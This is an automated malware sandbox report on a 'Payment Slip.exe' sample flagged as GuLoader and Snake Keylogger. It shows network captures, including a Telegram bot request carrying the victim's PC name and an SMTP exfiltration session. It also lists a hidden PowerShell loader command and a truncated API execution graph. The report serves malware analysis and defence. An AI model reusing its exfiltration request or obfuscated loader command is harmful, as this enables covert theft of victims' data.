                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HmDp9uyEVqk7FOo85OENMXEDXLyuKJtmxtQgIfB9JewDMCuHVjIkLSjK232%2BJ8N%2BLR39f9%2BJUq4z9k5sg9oT%2FzYD2mwJTS5amEpqlRHVDslM1dyHj%2Fd1seZx%2BRGvHvnI2pfUTqRK"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8aa5f6ea9043e2-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 08:06:02 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                            2024-07-25 08:06:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.549733149.154.167.220443528C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            TimestampBytes transferredDirectionData
                                            2024-07-25 08:06:02 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:374653%0D%0ADate%20and%20Time:%2027/07/2024%20/%2007:40:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20374653%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                            Host: api.telegram.org
                                            Connection: Keep-Alive
                                            2024-07-25 08:06:03 UTC344INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0
                                            Date: Thu, 25 Jul 2024 08:06:02 GMT
                                            Content-Type: application/json
                                            Content-Length: 55
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2024-07-25 08:06:03 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                            TimestampSource PortDest PortSource IPDest IPCommands
                                            Jul 25, 2024 10:06:10.481323957 CEST5874973466.29.159.53192.168.2.5220 PrivateEmail.com prod Mail Node
                                            Jul 25, 2024 10:06:10.481558084 CEST49734587192.168.2.566.29.159.53EHLO 374653
                                            Jul 25, 2024 10:06:10.736872911 CEST5874973466.29.159.53192.168.2.5250-mta-09.privateemail.com
                                            250-PIPELINING
                                            250-SIZE 81788928
                                            250-ETRN
                                            250-AUTH PLAIN LOGIN
                                            250-ENHANCEDSTATUSCODES
                                            250-8BITMIME
                                            250-CHUNKING
                                            250 STARTTLS
                                            Jul 25, 2024 10:06:10.737097025 CEST49734587192.168.2.566.29.159.53STARTTLS
                                            Jul 25, 2024 10:06:10.896609068 CEST5874973466.29.159.53192.168.2.5220 Ready to start TLS

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:04:04:06
                                            Start date:25/07/2024
                                            Path:C:\Users\user\Desktop\Payment Slip.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\Payment Slip.exe"
                                            Imagebase:0x400000
                                            File size:874'096 bytes
                                            MD5 hash:DB9B31DA65D0EF913176D54CEB4CF5F4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:2
                                            Start time:04:04:09
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"powershell.exe" -windowstyle hidden "$topstillingens=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ropeband.San';$Nedbringers=$topstillingens.SubString(29905,3);.$Nedbringers($topstillingens) "
                                            Imagebase:0x9e0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2679871550.00000000095F2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:04:04:09
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:04:04:58
                                            Start date:25/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\Masculinity.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\Masculinity.exe"
                                            Imagebase:0x400000
                                            File size:874'096 bytes
                                            MD5 hash:DB9B31DA65D0EF913176D54CEB4CF5F4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.3286769966.0000000020E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 32%, ReversingLabs
                                            Reputation:low
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:20.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:22.1%
                                              Total number of Nodes:1283
                                              Total number of Limit Nodes:35
                                              execution_graph 3727 404241 lstrcpynW lstrlenW 3728 401d41 GetDC GetDeviceCaps 3729 402b1b 18 API calls 3728->3729 3730 401d5f MulDiv ReleaseDC 3729->3730 3731 402b1b 18 API calls 3730->3731 3732 401d7e 3731->3732 3733 405f0a 18 API calls 3732->3733 3734 401db7 CreateFontIndirectW 3733->3734 3735 4024e6 3734->3735 3736 401a42 3737 402b1b 18 API calls 3736->3737 3738 401a48 3737->3738 3739 402b1b 18 API calls 3738->3739 3740 4019f0 3739->3740 3741 402744 3742 40273f 3741->3742 3742->3741 3743 402754 FindNextFileW 3742->3743 3744 4027a6 3743->3744 3746 40275f 3743->3746 3747 405ee8 lstrcpynW 3744->3747 3747->3746 3755 401cc6 3756 402b1b 18 API calls 3755->3756 3757 401cd9 SetWindowLongW 3756->3757 3758 4029c5 3757->3758 3467 401dc7 3475 402b1b 3467->3475 3469 401dcd 3470 402b1b 18 API calls 3469->3470 3471 401dd6 3470->3471 3472 401de8 EnableWindow 3471->3472 3473 401ddd ShowWindow 3471->3473 3474 4029c5 3472->3474 3473->3474 3476 405f0a 18 API calls 3475->3476 3477 402b2f 3476->3477 3477->3469 3759 4045c8 3760 4045f4 3759->3760 3761 404605 3759->3761 3820 4056a8 GetDlgItemTextW 3760->3820 3763 404611 GetDlgItem 3761->3763 3769 404670 3761->3769 3766 404625 3763->3766 3764 404754 3768 4048f5 3764->3768 3822 4056a8 GetDlgItemTextW 3764->3822 3765 4045ff 3767 40617c 5 API calls 3765->3767 3771 404639 SetWindowTextW 3766->3771 3772 4059de 4 API calls 3766->3772 3767->3761 3776 404194 8 API calls 3768->3776 3769->3764 3769->3768 3773 405f0a 18 API calls 3769->3773 3775 40412d 19 API calls 3771->3775 3777 40462f 3772->3777 3778 4046e4 SHBrowseForFolderW 3773->3778 3774 404784 3779 405a3b 18 API calls 3774->3779 3780 404655 3775->3780 3781 404909 3776->3781 3777->3771 3785 405933 3 API calls 3777->3785 3778->3764 3782 4046fc CoTaskMemFree 3778->3782 3783 40478a 3779->3783 3784 40412d 19 API calls 3780->3784 3786 405933 3 API calls 3782->3786 3823 405ee8 lstrcpynW 3783->3823 3787 404663 3784->3787 3785->3771 3788 404709 3786->3788 3821 404162 SendMessageW 3787->3821 3791 404740 SetDlgItemTextW 3788->3791 3796 405f0a 18 API calls 3788->3796 3791->3764 3792 404669 3794 406252 3 API calls 3792->3794 3793 4047a1 3795 406252 3 API calls 3793->3795 3794->3769 3802 4047a9 3795->3802 3797 404728 lstrcmpiW 3796->3797 3797->3791 3800 404739 lstrcatW 3797->3800 3798 4047e8 3824 405ee8 lstrcpynW 3798->3824 3800->3791 3801 4047ef 3803 4059de 4 API calls 3801->3803 3802->3798 3806 40597f 2 API calls 3802->3806 3808 40483a 3802->3808 3804 4047f5 GetDiskFreeSpaceW 3803->3804 3807 404818 MulDiv 3804->3807 3804->3808 3806->3802 3807->3808 3809 4048a4 3808->3809 3825 404976 3808->3825 3810 4048c7 3809->3810 3812 40140b 2 API calls 3809->3812 3833 40414f KiUserCallbackDispatcher 3810->3833 3812->3810 3813 404896 3815 4048a6 SetDlgItemTextW 3813->3815 3816 40489b 3813->3816 3815->3809 3818 404976 21 API calls 3816->3818 3817 4048e3 3817->3768 3834 40455d 3817->3834 3818->3809 3820->3765 3821->3792 3822->3774 3823->3793 3824->3801 3826 404993 3825->3826 3827 405f0a 18 API calls 3826->3827 3828 4049c8 3827->3828 3829 405f0a 18 API calls 3828->3829 3830 4049d3 3829->3830 3831 405f0a 18 API calls 3830->3831 3832 404a04 lstrlenW wsprintfW SetDlgItemTextW 3831->3832 3832->3813 3833->3817 3835 404570 SendMessageW 3834->3835 3836 40456b 3834->3836 3835->3768 3836->3835 3837 4042ca 3838 4042e2 3837->3838 3842 4043fc 3837->3842 3843 40412d 19 API calls 3838->3843 3839 404466 3840 404538 3839->3840 3841 404470 GetDlgItem 3839->3841 3848 404194 8 API calls 3840->3848 3844 4044f9 3841->3844 3845 40448a 3841->3845 3842->3839 3842->3840 3846 404437 GetDlgItem SendMessageW 3842->3846 3847 404349 3843->3847 3844->3840 3852 40450b 3844->3852 3845->3844 3851 4044b0 6 API calls 3845->3851 3868 40414f KiUserCallbackDispatcher 3846->3868 3850 40412d 19 API calls 3847->3850 3857 404533 3848->3857 3854 404356 CheckDlgButton 3850->3854 3851->3844 3855 404521 3852->3855 3856 404511 SendMessageW 3852->3856 3853 404461 3859 40455d SendMessageW 3853->3859 3866 40414f KiUserCallbackDispatcher 3854->3866 3855->3857 3858 404527 SendMessageW 3855->3858 3856->3855 3858->3857 3859->3839 3861 404374 GetDlgItem 3867 404162 SendMessageW 3861->3867 3863 40438a SendMessageW 3864 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3863->3864 3865 4043a7 GetSysColor 3863->3865 3864->3857 3865->3864 3866->3861 3867->3863 3868->3853 3869 401bca 3870 402b1b 18 API calls 3869->3870 3871 401bd1 3870->3871 3872 402b1b 18 API calls 3871->3872 3873 401bdb 3872->3873 3874 401beb 3873->3874 3876 402b38 18 API calls 3873->3876 3875 401bfb 3874->3875 3877 402b38 18 API calls 3874->3877 3878 401c06 3875->3878 3879 401c4a 3875->3879 3876->3874 3877->3875 3880 402b1b 18 API calls 3878->3880 3881 402b38 18 API calls 3879->3881 3882 401c0b 3880->3882 3883 401c4f 3881->3883 3885 402b1b 18 API calls 3882->3885 3884 402b38 18 API calls 3883->3884 3886 401c58 FindWindowExW 3884->3886 3887 401c14 3885->3887 3890 401c7a 3886->3890 3888 401c3a SendMessageW 3887->3888 3889 401c1c SendMessageTimeoutW 3887->3889 3888->3890 3889->3890 3891 4024ca 3892 402b38 18 API calls 3891->3892 3893 4024d1 3892->3893 3896 405b54 GetFileAttributesW CreateFileW 3893->3896 3895 4024dd 3896->3895 3897 40194b 3898 402b1b 18 API calls 3897->3898 3899 401952 3898->3899 3900 402b1b 18 API calls 3899->3900 3901 40195c 3900->3901 3902 402b38 18 API calls 3901->3902 3903 401965 3902->3903 3904 401979 lstrlenW 3903->3904 3905 4019b5 3903->3905 3906 401983 3904->3906 3906->3905 3910 405ee8 lstrcpynW 3906->3910 3908 40199e 3908->3905 3909 4019ab lstrlenW 3908->3909 3909->3905 3910->3908 3914 4019cf 3915 402b38 18 API calls 3914->3915 3916 4019d6 3915->3916 3917 402b38 18 API calls 3916->3917 3918 4019df 3917->3918 3919 4019e6 lstrcmpiW 3918->3919 3920 4019f8 lstrcmpW 3918->3920 3921 4019ec 3919->3921 3920->3921 2966 401e51 2984 402b38 2966->2984 2973 401ec6 CloseHandle 2977 402791 2973->2977 2974 401e77 WaitForSingleObject 2975 401e89 2974->2975 2976 401e9b GetExitCodeProcess 2975->2976 3004 40628b 2975->3004 2978 401eba 2976->2978 2979 401ead 2976->2979 2978->2973 2982 401eb8 2978->2982 3008 405e2f wsprintfW 2979->3008 2982->2973 2985 402b44 2984->2985 3009 405f0a 2985->3009 2988 401e57 2990 405192 2988->2990 2991 4051ad 2990->2991 3000 401e61 2990->3000 2992 4051c9 lstrlenW 2991->2992 2993 405f0a 18 API calls 2991->2993 2994 4051f2 2992->2994 2995 4051d7 lstrlenW 2992->2995 2993->2992 2997 405205 2994->2997 2998 4051f8 SetWindowTextW 2994->2998 2996 4051e9 lstrcatW 2995->2996 2995->3000 2996->2994 2999 40520b SendMessageW SendMessageW SendMessageW 2997->2999 2997->3000 2998->2997 2999->3000 3001 405663 CreateProcessW 3000->3001 3002 405692 CloseHandle 3001->3002 3003 401e67 3001->3003 3002->3003 3003->2973 3003->2974 3003->2977 3005 4062a8 PeekMessageW 3004->3005 3006 401e90 WaitForSingleObject 3005->3006 3007 40629e DispatchMessageW 3005->3007 3006->2975 3007->3005 3008->2982 3014 405f17 3009->3014 3010 406162 3011 402b65 3010->3011 3043 405ee8 lstrcpynW 3010->3043 3011->2988 3027 40617c 3011->3027 3013 405fca GetVersion 3013->3014 3014->3010 3014->3013 3015 406130 lstrlenW 3014->3015 3018 405f0a 10 API calls 3014->3018 3020 406045 GetSystemDirectoryW 3014->3020 3021 406058 GetWindowsDirectoryW 3014->3021 3022 40617c 5 API calls 3014->3022 3023 40608c SHGetSpecialFolderLocation 3014->3023 3024 405f0a 10 API calls 3014->3024 3025 4060d1 lstrcatW 3014->3025 3036 405db5 RegOpenKeyExW 3014->3036 3041 405e2f wsprintfW 3014->3041 3042 405ee8 lstrcpynW 3014->3042 3015->3014 3018->3015 3020->3014 3021->3014 3022->3014 3023->3014 3026 4060a4 SHGetPathFromIDListW CoTaskMemFree 3023->3026 3024->3014 3025->3014 3026->3014 3033 406189 3027->3033 3028 406204 CharPrevW 3031 4061ff 3028->3031 3029 4061f2 CharNextW 3029->3031 3029->3033 3031->3028 3032 406225 3031->3032 3032->2988 3033->3029 3033->3031 3034 4061de CharNextW 3033->3034 3035 4061ed CharNextW 3033->3035 3044 405960 3033->3044 3034->3033 3035->3029 3037 405e29 3036->3037 3038 405de9 RegQueryValueExW 3036->3038 3037->3014 3039 405e0a RegCloseKey 3038->3039 3039->3037 3041->3014 3042->3014 3043->3011 3045 405966 3044->3045 3046 40597c 3045->3046 3047 40596d CharNextW 3045->3047 3046->3033 3047->3045 3048 4052d1 3049 4052f2 GetDlgItem GetDlgItem GetDlgItem 3048->3049 3050 40547d 3048->3050 3093 404162 SendMessageW 3049->3093 3052 405486 GetDlgItem CreateThread FindCloseChangeNotification 3050->3052 3053 4054ae 3050->3053 3052->3053 3116 405265 OleInitialize 3052->3116 3055 4054d9 3053->3055 3057 4054c5 ShowWindow ShowWindow 3053->3057 3058 4054fe 3053->3058 3054 405363 3063 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 3054->3063 3056 405539 3055->3056 3060 405513 ShowWindow 3055->3060 3061 4054ed 3055->3061 3056->3058 3069 405547 SendMessageW 3056->3069 3098 404162 SendMessageW 3057->3098 3102 404194 3058->3102 3065 405533 3060->3065 3066 405525 3060->3066 3099 404106 3061->3099 3067 4053d9 3063->3067 3068 4053bd SendMessageW SendMessageW 3063->3068 3075 404106 SendMessageW 3065->3075 3074 405192 25 API calls 3066->3074 3070 4053ec 3067->3070 3071 4053de SendMessageW 3067->3071 3068->3067 3072 405560 CreatePopupMenu 3069->3072 3073 40550c 3069->3073 3094 40412d 3070->3094 3071->3070 3076 405f0a 18 API calls 3072->3076 3074->3065 3075->3056 3078 405570 AppendMenuW 3076->3078 3080 4055a0 TrackPopupMenu 3078->3080 3081 40558d GetWindowRect 3078->3081 3079 4053fc 3082 405405 ShowWindow 3079->3082 3083 405439 GetDlgItem SendMessageW 3079->3083 3080->3073 3084 4055bb 3080->3084 3081->3080 3085 405428 3082->3085 3086 40541b ShowWindow 3082->3086 3083->3073 3087 405460 SendMessageW SendMessageW 3083->3087 3088 4055d7 SendMessageW 3084->3088 3097 404162 SendMessageW 3085->3097 3086->3085 3087->3073 3088->3088 3089 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3088->3089 3091 405619 SendMessageW 3089->3091 3091->3091 3092 405642 GlobalUnlock SetClipboardData CloseClipboard 3091->3092 3092->3073 3093->3054 3095 405f0a 18 API calls 3094->3095 3096 404138 SetDlgItemTextW 3095->3096 3096->3079 3097->3083 3098->3055 3100 404113 SendMessageW 3099->3100 3101 40410d 3099->3101 3100->3058 3101->3100 3103 4041ac GetWindowLongW 3102->3103 3113 404235 3102->3113 3104 4041bd 3103->3104 3103->3113 3105 4041cc GetSysColor 3104->3105 3106 4041cf 3104->3106 3105->3106 3107 4041d5 SetTextColor 3106->3107 3108 4041df SetBkMode 3106->3108 3107->3108 3109 4041f7 GetSysColor 3108->3109 3110 4041fd 3108->3110 3109->3110 3111 404204 SetBkColor 3110->3111 3112 40420e 3110->3112 3111->3112 3112->3113 3114 404221 DeleteObject 3112->3114 3115 404228 CreateBrushIndirect 3112->3115 3113->3073 3114->3115 3115->3113 3123 404179 3116->3123 3118 404179 SendMessageW 3119 4052c1 OleUninitialize 3118->3119 3120 405288 3122 4052af 3120->3122 3126 401389 3120->3126 3122->3118 3124 404191 3123->3124 3125 404182 SendMessageW 3123->3125 3124->3120 3125->3124 3127 401390 3126->3127 3128 4013fe 3127->3128 3129 4013cb MulDiv SendMessageW 3127->3129 3128->3120 3129->3127 3922 402251 3923 40225f 3922->3923 3924 402259 3922->3924 3926 40226d 3923->3926 3927 402b38 18 API calls 3923->3927 3925 402b38 18 API calls 3924->3925 3925->3923 3928 402b38 18 API calls 3926->3928 3930 40227b 3926->3930 3927->3926 3928->3930 3929 402b38 18 API calls 3931 402284 WritePrivateProfileStringW 3929->3931 3930->3929 3130 401752 3131 402b38 18 API calls 3130->3131 3132 401759 3131->3132 3133 401781 3132->3133 3134 401779 3132->3134 3188 405ee8 lstrcpynW 3133->3188 3187 405ee8 lstrcpynW 3134->3187 3137 40177f 3141 40617c 5 API calls 3137->3141 3138 40178c 3189 405933 lstrlenW CharPrevW 3138->3189 3166 40179e 3141->3166 3145 4017b0 CompareFileTime 3145->3166 3146 401870 3148 405192 25 API calls 3146->3148 3147 401847 3149 405192 25 API calls 3147->3149 3158 40185c 3147->3158 3151 40187a 3148->3151 3149->3158 3150 405ee8 lstrcpynW 3150->3166 3172 403060 3151->3172 3154 4018a1 SetFileTime 3155 4018b3 FindCloseChangeNotification 3154->3155 3157 4018c4 3155->3157 3155->3158 3156 405f0a 18 API calls 3156->3166 3159 4018c9 3157->3159 3160 4018dc 3157->3160 3161 405f0a 18 API calls 3159->3161 3162 405f0a 18 API calls 3160->3162 3164 4018d1 lstrcatW 3161->3164 3165 4018e4 3162->3165 3164->3165 3167 4056c4 MessageBoxIndirectW 3165->3167 3166->3145 3166->3146 3166->3147 3166->3150 3166->3156 3168 405b2f GetFileAttributesW 3166->3168 3171 405b54 GetFileAttributesW CreateFileW 3166->3171 3192 40622b FindFirstFileW 3166->3192 3195 4056c4 3166->3195 3167->3158 3169 405b41 SetFileAttributesW 3168->3169 3170 405b4e 3168->3170 3169->3170 3170->3166 3171->3166 3173 403070 SetFilePointer 3172->3173 3174 40308c 3172->3174 3173->3174 3199 40317b GetTickCount 3174->3199 3179 40317b 43 API calls 3180 4030c3 3179->3180 3181 40313d ReadFile 3180->3181 3183 40188d 3180->3183 3186 4030d3 3180->3186 3181->3183 3183->3154 3183->3155 3184 405bd7 ReadFile 3184->3186 3185 403106 WriteFile 3185->3183 3185->3186 3186->3183 3186->3184 3186->3185 3187->3137 3188->3138 3190 401792 lstrcatW 3189->3190 3191 40594f lstrcatW 3189->3191 3190->3137 3191->3190 3193 406241 FindClose 3192->3193 3194 40624c 3192->3194 3193->3194 3194->3166 3196 4056d9 3195->3196 3197 405725 3196->3197 3198 4056ed MessageBoxIndirectW 3196->3198 3197->3166 3198->3197 3200 4032e5 3199->3200 3201 4031aa 3199->3201 3202 402d18 33 API calls 3200->3202 3214 40330d SetFilePointer 3201->3214 3208 403093 3202->3208 3204 4031b5 SetFilePointer 3209 4031da 3204->3209 3208->3183 3212 405bd7 ReadFile 3208->3212 3209->3208 3210 40326f WriteFile 3209->3210 3211 4032c6 SetFilePointer 3209->3211 3215 4032f7 3209->3215 3218 40638e 3209->3218 3225 402d18 3209->3225 3210->3208 3210->3209 3211->3200 3213 4030ac 3212->3213 3213->3179 3213->3183 3214->3204 3216 405bd7 ReadFile 3215->3216 3217 40330a 3216->3217 3217->3209 3219 4063b3 3218->3219 3220 4063bb 3218->3220 3219->3209 3220->3219 3221 406442 GlobalFree 3220->3221 3222 40644b GlobalAlloc 3220->3222 3223 4064c2 GlobalAlloc 3220->3223 3224 4064b9 GlobalFree 3220->3224 3221->3222 3222->3219 3222->3220 3223->3219 3223->3220 3224->3223 3226 402d41 3225->3226 3227 402d29 3225->3227 3230 402d51 GetTickCount 3226->3230 3231 402d49 3226->3231 3228 402d32 DestroyWindow 3227->3228 3229 402d39 3227->3229 3228->3229 3229->3209 3230->3229 3233 402d5f 3230->3233 3232 40628b 2 API calls 3231->3232 3232->3229 3234 402d94 CreateDialogParamW ShowWindow 3233->3234 3235 402d67 3233->3235 3234->3229 3235->3229 3240 402cfc 3235->3240 3237 402d75 wsprintfW 3238 405192 25 API calls 3237->3238 3239 402d92 3238->3239 3239->3229 3241 402d0b 3240->3241 3242 402d0d MulDiv 3240->3242 3241->3242 3242->3237 3932 402452 3933 402c42 19 API calls 3932->3933 3934 40245c 3933->3934 3935 402b1b 18 API calls 3934->3935 3936 402465 3935->3936 3937 402489 RegEnumValueW 3936->3937 3938 40247d RegEnumKeyW 3936->3938 3940 402791 3936->3940 3939 4024a2 RegCloseKey 3937->3939 3937->3940 3938->3939 3939->3940 3243 4022d3 3244 402303 3243->3244 3245 4022d8 3243->3245 3246 402b38 18 API calls 3244->3246 3266 402c42 3245->3266 3249 40230a 3246->3249 3248 4022df 3250 4022e9 3248->3250 3254 402320 3248->3254 3255 402b78 RegOpenKeyExW 3249->3255 3251 402b38 18 API calls 3250->3251 3252 4022f0 RegDeleteValueW RegCloseKey 3251->3252 3252->3254 3256 402c0c 3255->3256 3258 402ba3 3255->3258 3256->3254 3257 402bc9 RegEnumKeyW 3257->3258 3259 402bdb RegCloseKey 3257->3259 3258->3257 3258->3259 3261 402c00 RegCloseKey 3258->3261 3264 402b78 3 API calls 3258->3264 3270 406252 GetModuleHandleA 3259->3270 3263 402bef 3261->3263 3263->3256 3264->3258 3265 402c1b RegDeleteKeyW 3265->3263 3267 402b38 18 API calls 3266->3267 3268 402c5b 3267->3268 3269 402c69 RegOpenKeyExW 3268->3269 3269->3248 3271 406279 GetProcAddress 3270->3271 3272 40626e LoadLibraryA 3270->3272 3273 402beb 3271->3273 3272->3271 3272->3273 3273->3263 3273->3265 3942 401ed4 3943 402b38 18 API calls 3942->3943 3944 401edb 3943->3944 3945 40622b 2 API calls 3944->3945 3946 401ee1 3945->3946 3948 401ef2 3946->3948 3949 405e2f wsprintfW 3946->3949 3949->3948 3391 403c55 3392 403da8 3391->3392 3393 403c6d 3391->3393 3395 403df9 3392->3395 3396 403db9 GetDlgItem GetDlgItem 3392->3396 3393->3392 3394 403c79 3393->3394 3397 403c84 SetWindowPos 3394->3397 3398 403c97 3394->3398 3400 403e53 3395->3400 3409 401389 2 API calls 3395->3409 3399 40412d 19 API calls 3396->3399 3397->3398 3402 403cb4 3398->3402 3403 403c9c ShowWindow 3398->3403 3404 403de3 SetClassLongW 3399->3404 3401 404179 SendMessageW 3400->3401 3405 403da3 3400->3405 3432 403e65 3401->3432 3406 403cd6 3402->3406 3407 403cbc DestroyWindow 3402->3407 3403->3402 3408 40140b 2 API calls 3404->3408 3411 403cdb SetWindowLongW 3406->3411 3412 403cec 3406->3412 3410 4040b6 3407->3410 3408->3395 3413 403e2b 3409->3413 3410->3405 3420 4040e7 ShowWindow 3410->3420 3411->3405 3417 403d95 3412->3417 3418 403cf8 GetDlgItem 3412->3418 3413->3400 3414 403e2f SendMessageW 3413->3414 3414->3405 3415 40140b 2 API calls 3415->3432 3416 4040b8 DestroyWindow EndDialog 3416->3410 3419 404194 8 API calls 3417->3419 3421 403d28 3418->3421 3422 403d0b SendMessageW IsWindowEnabled 3418->3422 3419->3405 3420->3405 3424 403d35 3421->3424 3425 403d7c SendMessageW 3421->3425 3426 403d48 3421->3426 3435 403d2d 3421->3435 3422->3405 3422->3421 3423 405f0a 18 API calls 3423->3432 3424->3425 3424->3435 3425->3417 3429 403d50 3426->3429 3430 403d65 3426->3430 3427 404106 SendMessageW 3431 403d63 3427->3431 3428 40412d 19 API calls 3428->3432 3464 40140b 3429->3464 3434 40140b 2 API calls 3430->3434 3431->3417 3432->3405 3432->3415 3432->3416 3432->3423 3432->3428 3437 40412d 19 API calls 3432->3437 3452 403ff8 DestroyWindow 3432->3452 3436 403d6c 3434->3436 3435->3427 3436->3417 3436->3435 3438 403ee0 GetDlgItem 3437->3438 3439 403ef5 3438->3439 3440 403efd ShowWindow KiUserCallbackDispatcher 3438->3440 3439->3440 3461 40414f KiUserCallbackDispatcher 3440->3461 3442 403f27 EnableWindow 3445 403f3b 3442->3445 3443 403f40 GetSystemMenu EnableMenuItem SendMessageW 3444 403f70 SendMessageW 3443->3444 3443->3445 3444->3445 3445->3443 3462 404162 SendMessageW 3445->3462 3463 405ee8 lstrcpynW 3445->3463 3448 403f9e lstrlenW 3449 405f0a 18 API calls 3448->3449 3450 403fb4 SetWindowTextW 3449->3450 3451 401389 2 API calls 3450->3451 3451->3432 3452->3410 3453 404012 CreateDialogParamW 3452->3453 3453->3410 3454 404045 3453->3454 3455 40412d 19 API calls 3454->3455 3456 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3455->3456 3457 401389 2 API calls 3456->3457 3458 404096 3457->3458 3458->3405 3459 40409e ShowWindow 3458->3459 3460 404179 SendMessageW 3459->3460 3460->3410 3461->3442 3462->3445 3463->3448 3465 401389 2 API calls 3464->3465 3466 401420 3465->3466 3466->3435 3950 4014d7 3951 402b1b 18 API calls 3950->3951 3952 4014dd Sleep 3951->3952 3954 4029c5 3952->3954 3478 403358 #17 SetErrorMode OleInitialize 3479 406252 3 API calls 3478->3479 3480 40339b SHGetFileInfoW 3479->3480 3551 405ee8 lstrcpynW 3480->3551 3482 4033c6 GetCommandLineW 3552 405ee8 lstrcpynW 3482->3552 3484 4033d8 GetModuleHandleW 3485 4033f0 3484->3485 3486 405960 CharNextW 3485->3486 3487 4033ff CharNextW 3486->3487 3489 40340f 3487->3489 3488 4034e4 3490 4034f8 GetTempPathW 3488->3490 3489->3488 3489->3489 3493 405960 CharNextW 3489->3493 3501 4034e6 3489->3501 3553 403324 3490->3553 3492 403510 3494 403514 GetWindowsDirectoryW lstrcatW 3492->3494 3495 40356a DeleteFileW 3492->3495 3493->3489 3496 403324 11 API calls 3494->3496 3561 402dba GetTickCount GetModuleFileNameW 3495->3561 3498 403530 3496->3498 3498->3495 3500 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3498->3500 3499 40357e 3502 403616 3499->3502 3504 403606 3499->3504 3508 405960 CharNextW 3499->3508 3503 403324 11 API calls 3500->3503 3645 405ee8 lstrcpynW 3501->3645 3648 4037c0 3502->3648 3507 403562 3503->3507 3591 